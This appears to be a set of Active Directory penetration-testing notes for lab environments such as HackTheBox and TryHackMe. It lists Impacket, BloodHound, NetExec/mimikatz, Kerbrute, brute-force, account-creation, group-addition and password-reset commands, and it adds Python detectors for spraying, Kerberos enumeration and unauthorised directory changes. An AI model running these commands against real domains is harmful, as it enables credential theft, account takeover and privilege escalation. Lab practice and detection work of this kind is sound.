Impacket
To get a TGT (Ticket Granting Ticket) with Impacket:
getTGT.py domain.htb/user
To dump hashes:
secretsdump.py htb.local/aditya:aditya@<ip>
Bloodhound
To use the TGT with BloodHound (the ticket is passed through the KRB5CCNAME environment variable):
KRB5CCNAME=user.ccache ./bloodhound.py -k -dc dc.domain.htb -ns <ip> -c All -d domain.htb -u user@domain.htb
NetExec
mimikatz module:
nxc smb <ip> -u 'Administrator' -p 'PASS' --local-auth -M mimikatz
nxc smb <ip> -u 'Administrator' -p 'PASS' -M mimikatz
nxc smb <ip> -u Administrator -p 'PASS' -M mimikatz -o COMMAND='privilege::debug'
Password bruteforce (user list and password list; note the binary is nxc, not nsc):
nxc smb <ip> -u userlist.out -p passlist.txt
Kerbrute
To check which users exist and then get their hashes:
kerbrute userenum --dc dc.domain.htb -d domain.htb username.txt
If hashcat can't crack the resulting hash, use the --downgrade flag.
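The spraying and enumeration commands above leave a recognisable trace on the domain controller, and this is what a defender looks for. The following is an added example in Python, not part of the original notes: it runs two simple detections over constructed Security-log records (Event ID 4625 failed logons with their Sub Status, and Event ID 4768 Kerberos TGT requests with their Result Code). The event tuple layout, thresholds and the IP addresses are assumptions made for the example.

```python
"""Detect the log patterns left by SMB password spraying (one source, many
accounts failing) and Kerberos user enumeration (many TGT requests for
non-existent principals). Added defender-side example; events are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed records: (iso_timestamp, event_id, account, source_ip, status_code)
# 4625 = failed logon; Sub Status 0xC000006A = bad password, 0xC0000064 = no such user
# 4768 = Kerberos TGT requested; Result Code 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN
SAMPLE_EVENTS = [
    ("2024-01-01T10:00:00", 4625, "alice", "10.0.0.5", "0xC000006A"),  # single typo, benign
    ("2024-01-01T10:00:01", 4625, "alice", "10.0.0.9", "0xC000006A"),
    ("2024-01-01T10:00:02", 4625, "bob",   "10.0.0.9", "0xC000006A"),
    ("2024-01-01T10:00:03", 4625, "carol", "10.0.0.9", "0xC000006A"),
    ("2024-01-01T10:00:04", 4625, "dave",  "10.0.0.9", "0xC000006A"),
    ("2024-01-01T10:00:05", 4625, "erin",  "10.0.0.9", "0xC000006A"),
    ("2024-01-01T10:00:06", 4625, "frank", "10.0.0.9", "0xC0000064"),
    ("2024-01-01T10:05:00", 4768, "alice", "10.0.0.5", "0x0"),         # normal TGT request
    ("2024-01-01T10:05:01", 4768, "aaron", "10.0.0.9", "0x6"),
    ("2024-01-01T10:05:01", 4768, "abby",  "10.0.0.9", "0x6"),
    ("2024-01-01T10:05:02", 4768, "adam",  "10.0.0.9", "0x6"),
    ("2024-01-01T10:05:02", 4768, "bob",   "10.0.0.9", "0x0"),
]


def detect_password_spray(events, min_users=5, window=timedelta(minutes=5)):
    """Return {source_ip: sorted accounts} for every source that produced failed
    logons (4625) for at least `min_users` distinct accounts inside `window`."""
    by_src = defaultdict(list)
    for ts, eid, user, src, _status in events:
        if eid == 4625:
            by_src[src].append((datetime.fromisoformat(ts), user))
    hits = {}
    for src, items in by_src.items():
        items.sort()
        start = 0
        for end in range(len(items)):
            # slide the window start forward until it fits inside `window`
            while items[end][0] - items[start][0] > window:
                start += 1
            if len({u for _, u in items[start:end + 1]}) >= min_users:
                hits[src] = sorted({u for _, u in items})  # report every account tried
                break
    return hits


def detect_kerberos_userenum(events, min_unknown=3):
    """Return {source_ip: count} for sources with at least `min_unknown` TGT
    requests (4768) that failed with Result Code 0x6 (principal unknown), the
    signature of a tool probing a username list against the KDC."""
    counts = defaultdict(int)
    for _ts, eid, _user, src, status in events:
        if eid == 4768 and status == "0x6":
            counts[src] += 1
    return {src: n for src, n in counts.items() if n >= min_unknown}


if __name__ == "__main__":
    print("spray sources:", detect_password_spray(SAMPLE_EVENTS))
    print("userenum sources:", detect_kerberos_userenum(SAMPLE_EVENTS))
```

The spray detector keys on distinct accounts per source rather than on failures per account, because spraying keeps each account under the lockout threshold; the Kerberos check keys on 0x6 because a real user mistyping a password produces 0x18 (pre-auth failed), not an unknown principal.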
Enumeration
To check domain details:
Individual accounts can also be enumerated:
net user /domain
To check group details
To add new user to domain:
net user aditya aditya123@ /add /domain
To add a user to a group (the user name comes before /add; /domain targets the domain group rather than a local one):
net group "Exchange Windows Permissions" aditya /add /domain
To list the users in a group:
net group "Tier 1 Admins" /domain
To check the password policy, lockout policy, etc.:
To reset another user's password, if you have the permission, use:
Set-ADAccountPassword name -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
New Password: *********
If the username is already present (in the form <domain>\<username>), then:
runas.exe /netonly /user:<domain>\<username> cmd.exe
PowerShell:
Get-ADUser -Identity mr.robot -Server evilcorp.com -Properties *
Get-ADUser -Filter 'Name -like "*stevens"' -Server za.tryhackme.com | Format-Table Name,SamAccountName -A
For groups:
Get-ADGroup -Identity Administrators -Server za.tryhackme.com
Get-ADGroupMember -Identity Administrators -Server za.tryhackme.com
For domains:
Get-ADDomain -Server za.tryhackme.com
Change password (as the user, supplying the old password; contrast with the -Reset form above, which needs no old password):
Set-ADAccountPassword -Identity gordon.stevens -Server za.tryhackme.com -OldPassword (ConvertTo-SecureString -AsPlaintext "old" -force) -NewPassword (ConvertTo-SecureString -AsPlainText "new" -Force)
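The account and group changes in this section (net user /add, net group /add, Set-ADAccountPassword -Reset) each write a distinct Security-log event on the domain controller, and reviewing those events is how a defender catches an unauthorised change. The following is an added example in Python, not part of the original notes: it flags additions to sensitive groups (Event IDs 4728/4732/4756, member added to a security-enabled global/local/universal group) and administrative password resets (4724) made by an account outside an approved set, while leaving self-service password changes (4723, which require the old password) alone. The dictionary layout, the group list and the approved-admin set are assumptions made for the example.

```python
"""Review constructed Security-log records for unauthorised directory changes.
4728/4732/4756 = member added to a security-enabled group (net group ... /add)
4724 = password reset on another account (Set-ADAccountPassword -Reset)
4723 = user changed their own password with the old one (-OldPassword form)
Added defender-side example; events and allow-lists are constructed."""

# Constructed: groups whose membership changes always deserve review
SENSITIVE_GROUPS = {
    "Domain Admins", "Administrators",
    "Exchange Windows Permissions", "Tier 1 Admins",
}
GROUP_ADD_EVENTS = {4728, 4732, 4756}
# Constructed: the only account expected to perform these actions (e.g. a helpdesk role)
APPROVED_ADMINS = {"CORP\\helpdesk-svc"}

SAMPLE_EVENTS = [
    {"id": 4728, "subject": "CORP\\jdoe",         "target": "aditya",         "group": "Exchange Windows Permissions"},
    {"id": 4728, "subject": "CORP\\helpdesk-svc", "target": "bob",            "group": "Tier 1 Admins"},
    {"id": 4728, "subject": "CORP\\jdoe",         "target": "carol",          "group": "HR Staff"},
    {"id": 4724, "subject": "CORP\\jdoe",         "target": "gordon.stevens", "group": None},
    {"id": 4724, "subject": "CORP\\helpdesk-svc", "target": "erin",           "group": None},
    {"id": 4723, "subject": "CORP\\gordon.stevens", "target": "gordon.stevens", "group": None},
]


def sensitive_group_additions(events, approved=APPROVED_ADMINS):
    """(subject, target, group) for each sensitive-group addition whose subject
    is not in the approved set. Non-sensitive groups are ignored."""
    return [
        (e["subject"], e["target"], e["group"])
        for e in events
        if e["id"] in GROUP_ADD_EVENTS
        and e["group"] in SENSITIVE_GROUPS
        and e["subject"] not in approved
    ]


def unapproved_password_resets(events, approved=APPROVED_ADMINS):
    """(subject, target) for each 4724 reset by a non-approved subject.
    4723 self-changes are excluded: they prove knowledge of the old password,
    whereas a 4724 reset only proves the subject held reset rights."""
    return [
        (e["subject"], e["target"])
        for e in events
        if e["id"] == 4724 and e["subject"] not in approved
    ]


if __name__ == "__main__":
    for subject, target, group in sensitive_group_additions(SAMPLE_EVENTS):
        print(f"REVIEW: {subject} added {target} to {group}")
    for subject, target in unapproved_password_resets(SAMPLE_EVENTS):
        print(f"REVIEW: {subject} reset the password of {target}")
```

Passing `approved=set()` turns both functions into a full audit listing, which is the usual starting point when building the approved set for a real environment.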